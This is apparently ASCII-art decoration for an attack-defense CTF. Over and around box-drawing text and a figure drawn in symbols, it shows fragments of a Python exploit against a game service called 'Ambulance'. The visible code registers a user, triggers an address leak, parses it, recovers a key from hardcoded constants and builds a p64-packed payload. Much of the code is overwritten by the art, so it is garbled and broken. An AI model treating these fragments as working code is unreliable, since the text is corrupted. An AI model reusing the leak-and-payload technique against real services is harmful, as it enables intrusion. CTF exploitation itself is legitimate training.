   ┌────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┬────────┐
   │  2023202320230202302302302300302032032030230320333020202                                                               │        │
   │  ┌────────                                                                                                             │        │
   │  │ 2302302                                                                                                             │        │
   │  │  ┌────────────────────────────────────────────                                                                      │        │
   │  │  │                                                                                                                  │        ├───────┐
   │  │  │    ┌┬────┐          ┌────┬┐ ───┬───  ┌──────        ┌──────  ┌─┐  ┌┐     ┌─┐   ┌┬───┐   ┌┐       ┌─────┬┐        │        │       │
   │  │  │    ││    │          │    └┘    │     │              │        └┼┘  ││\    │┼┘   ││   │   ├┘       │     └┘        │        │       │
   │  │       ││    │          │          │     │              │         │   ││ \   ││    ││   │   │        │               │        │       │
   │  │       ││>───┘  ┌┐  ┌┐  │          │     ├────          ├────     │   ││  \  ││   ─┼┼───┤   │        └─────┐         │        │       │
   │  │       ││  \    ││  └┤  │          │     │              │         │   ││   \ ││    ││   │   │              │         │        │       │
   │  │       ││   \   ││   │  │    ┌┐   ┌┼┐   ┌┼┐            ┌┼┐        │   ││    \││    ││   ├┐  │    ┌┐  ┌┐    │         │        │       │
   │  │       └┘    \  └┴───┘  └────┴┘   └─┘   └─┘            └─┘       ─┴─  └┘     └┘    └┘   └┘  └────┴┘  └┴────┘    │    │        │       │
   │  │                                                                                                                │    │        │       │
   │                                                                                                                   │    │        │       │
   │                                                                                                                   │    │        │       │
   │                                     ┌┬───┬┐   ┌────┬┐  ┌┬───┬┐  ┌┬────┐                                           │    │        │       │
   │                                     └┘   ││   │    ││  └┘   ││  └┘    │                                           │    │        │       ├─────┐
   │                                          ││   │    ││       ││        │                                           │    │        │       │     │
   │                                     ┌┬───┴┘   │    ││  ┌┬───┴┘   ─────┤                                           │    │        │       │     │
   │                                     ││        │    ││  ││             │                                           │    │        │       │     │
   │                                     ││   ┌┐   │    ││  ││   ┌┐  ┌┐    │                                           │    │        │   ┌───┤     │
   └──┬────┐                             └┴───┴┘   └────┴┘  └┴───┴┘  └┴────┘                                           │  │ │        │   │   │     │
      └─┼┼┼┴┬┐                                                                                                         │  │ │        │   │   │     ├───┐
        │┼│ │┼─┐                                                                                         ──────────────┘  │ │        │   │   │     │   │
        │┼│ ││ └┐                                                                                         230203023023    │ │        │   │   │     │   │
┌▲──────┴─┴─┘►  ├┐                                                    ────────────────────────────────────────────────────┘ │        │   │   │     │   │
││            ──┼┼─┐                                    2020302030230302030230230202030303023020202030303020302030202302033 │        │   │   │     │   │
││              └──┴────────────────────────────────────────────────────────────────────────────────────────────────────────┘        │   │   │     │   │
│┤◄───┐                              **   **                                                                                         │   │   │     │   │
││    │                         **************  *****                   async def attack(io: api.──bu┼anc┼, cmd: str) -> None:       │   │   │     │   │
├┘    │                      **$$$$  ****   $$*******                       await io.read_banner()                                   │   │   │     │   │
│     │                    * $$$$$$$$$   $$* **   *$**                                                                               │   │   │     │   │
│     │                   *  $    $$$$$* $* *$$$$$$$$$**                    q = 0xa0fca03a870f6e3fc52aeef0d61f19915ca241a1b2e1cb33cb1│   │   │     │   │
◄─┐   │                  *  $$$$$$$$$$$$$ $$$$$$$$$**$$*                    zero_order = 0x507e501d4387b71fe29577786b0f8cc           │   │   │     │   │
│ │   │                  $$  $$$$$$$ $$$$$$$$ $$$$$$$$$$$$                                                                       ┌───┤   │   │     │   │
│ │   │                *$ *$$$$$$$$$$$*$*$*$    *****$***                   username = secrets.token_hex(8)                      │   │   │   │     │   │
│ │   │              **$$ $$$$$$*$ **    [[[[[[[   [[[                      _, (password, _) = await io.register(username)       │   │   │   │     │   │
│ │   │              **$**$$**$$$@@     [  #####  ## #                                                                           │   │   │   │     │   │
│ │   │            *$$$*****$$$$$$         ..###   ###                      async with api.Ambulance.connect(IP, PORT) as io2:   │   │   │   │     │   │
│ │   │            **$$$$$$$$ [[$$ ##        +++   ###                          await io2.read_banner()                          │   │   │   │     │   └───►
│ │   │             $$$$$$**[[  [[$$    #          ##                           await io2.login(username, password)              │   │   │   │     │
│ │   │               $$$***#[  #     ###      #   ##                           await io2.update_disease('vzlo─┐, 'vzlom')       │   │   │   │     │
│ │   │               $$$$$$ ##++ #+        ## ######                           await io2.user_exit()          └───┐             │   │   │   │     │
│ │   │               $$$$$#  ###       ##       ##                                                                └───────┐     │   │   │   │     │
│ │   │               $$$$$#   ##            ######                         _, (_, disease) = await io.print_info()        └─┐   │   │   │   │     │
│ │   │                 $$$### ##      ##    #####                          address = disease.strip('<>┌┐')──┐lit(' ')[-1]   │   │   │   │   │     │
│ │   │                   $#$ #  +##  #   ##  ## #                                                   ──┴┼─┐  ├───┬──┐        │   │   │   │   │     │
  │   │                   $$$$     #   +++#######                           leak = int(address, 16)     │┼┴┬─┼┼─┼│  ├─┐      │   │   │   │   │     │
  │   │                   $$*      ##############                           print(f'leak @ 0x{leak:x}'┌─┴┤ ├──┘ ├┴──┴─┼─┐    │   │   │   │   │     │
      │                   *$$# #  ++     ++++        ######                     ┌───────────────┐   ┌─┘  └─┤   ┌┘     └─┴─┐      │   │   │   │     │
      │                   $$###         ++###      ##      ++                   │┼┼┼┼┼┼┼┼───────┴───┘e_numb└───┘1234 * q +│zer   │   │   │   │     │
      │                   $# +#      #######+     +##+   ## ##                  └───┼──┼│  _recovery_key(password, zero_key)     │  ◄┘   │   │     │
      │                   *#+ ##     ++###+###    +  ###+     ##                    │  │┼┐ ic key to───────   ┌───────           │       │   │     │
      │                   ## ##+#  # ++ +++++##  +  #++##       ##                    ─┼─┴┐     ┌─┬┐       ───┘       ──┐        │       │   │     │
      │                  ##+#  ##  ++##+     ###++ ##++           #              ad =│ │  │x 14 │ ├┴┐    141) *  5      └─────   │       │   │     │
      │                 ##+ +   ++  +##+  +   +######## #          #        payload ┌┘ │  │d = │  │ │    ncode(  yload)          │   ◄───┘   │     ▼
      │               ###+     ++++##          ++ # # ##+         ##        await i │  │  │_ ec└──┼─┼┐   payloa  password, '')   │           │
      │           ####  +        ++            +++++# ## ##+        #                  ├─┬┤       │ ├┘                           │           │
      │      ###++   +                           ##############+ +##+##     p     ┌────┤ ├┘o   [  └─┘                  ◄─────────┘           │
      │    ##+       ##                         ++#+ ++#########++##  "           │    └─┘ 1   1414141) * 30,                                │
      │                                                                               , p64(   31),                                          └─►
